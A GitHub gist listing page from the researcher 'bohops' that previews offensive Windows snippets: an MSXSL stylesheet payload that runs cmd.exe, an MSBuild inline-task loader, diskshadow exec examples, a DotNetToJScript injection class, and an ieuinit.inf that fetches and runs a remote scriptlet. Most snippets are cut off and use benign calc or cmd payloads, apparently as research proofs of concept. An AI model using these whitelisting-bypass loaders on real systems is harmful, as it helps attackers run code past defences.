Skip to content

Instantly share code, notes, and snippets.

View bohops's full-sized avatar

bohops

472 followers · 13 following
View GitHub Profile
@bohops
bohops / WSH_approved_list.txt
Created March 13, 2019 02:32
WldpIsClassInApprovedList approved classID for WLDP_HOST_ID_WSH hosts (which includes COM scriptlets)
041e868e-0c7d-48c6-965f-5fd576530e5b
0438c02b-eb9c-4e42-81ad-407f6cd6cde1
078b1f7d-c34c-4b13-a7c3-9663901650f1
0abb2961-2cc1-4f1d-be8e-9d330d06b77d
0d7237e6-930f-4682-ad0a-52ebffd3aee3
0d972387-817b-46e7-913f-e9993ff401eb
0e770b12-7221-4a5d-86ee-77310a5506bb
0fa57208-5100-4cd6-955c-fe69f8898973
1080a020-2b47-4da9-8095-dbc9cefffc04
10cf2e12-1681-4c53-adc0-932c84832cd8
@bohops
bohops / Abandoned_COM_PowerShell.txt
Created November 4, 2018 22:18
- Abandoned COM Discovery Script.
- Makes a few assumptions, needs refinement (e.g. doesn't account for all extensions)
function GetMissing($server){$clsids=@{};cd $env:windir'\system32\';$srv=gwmi Win32_COMSetting | ?{$_.$server -ne $null};$srv | ForEach {$clsids.add($_.ComponentId,$_.$server)};$clsids.Keys | foreach {$p=[Environment]::ExpandEnvironmentVariables($clsids[$_]);$p=$p.Replace('"','');if($p.Contains('.exe ')){$p=$p.Substring(0,$p.IndexOf('.exe'))+'.exe'};if($(test-path $p) -eq $False){$_+' | '+$server+' | '+$p}}};GetMissing('LocalServer');GetMissing('LocalServer32');GetMissing('InprocServer');GetMissing('InprocServer32')
@bohops
bohops / minimalist.xml
Created November 4, 2018 00:24
MSXSL Single File Payload
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
@bohops
bohops / Inject.cs
Created October 30, 2018 03:08
DotNetToJScript Build Walkthrough
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
public TestClass()
{}
@bohops
bohops / PowerShell TCP_Interval.txt
Created October 17, 2018 16:42
while ($true) {
$(Get-Date).ToUniversalTime()
$Runspace = [runspacefactory]::CreateRunspace()
$PowerShell = [powershell]::Create()
$PowerShell.runspace = $Runspace
$Runspace.Open()
[void]$PowerShell.AddScript({
$tcpConnection = New-Object System.Net.Sockets.TcpClient('1.1.1.1', 80)
$tcpStream = $tcpConnection.GetStream()
@bohops
bohops / ProgIDs.txt
Last active September 26, 2022 23:23
file
StaticMetafile
StaticDib
clsid
objref
ADODB.Command.6.0
ADODB.Parameter.6.0
ADODB.Connection.6.0
ADODB.Recordset.6.0
ADODB.Error.6.0
@bohops
bohops / diskshadow.txt
Created May 21, 2018 02:21
Execute
=======
*Interactive Mode
cmd.exe
c:\windows\system32\diskshadow.exe
> exec calc.exe
> exec "cmd.exe" /c calc.exe
> exit
@bohops
bohops / ieuinit.inf
Created May 20, 2018 21:23
[version]
signature="$CHICAGO$"
AdvancedINF=2.0
[DefaultInstall.Windows7]
UnRegisterOCXs=FunRun
[FunRun]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct
@bohops
bohops / JankyAF.csproj
Last active April 28, 2022 21:44
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
@bohops
bohops / calc_exe.inf
Created May 19, 2018 15:24
; DRIVER.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385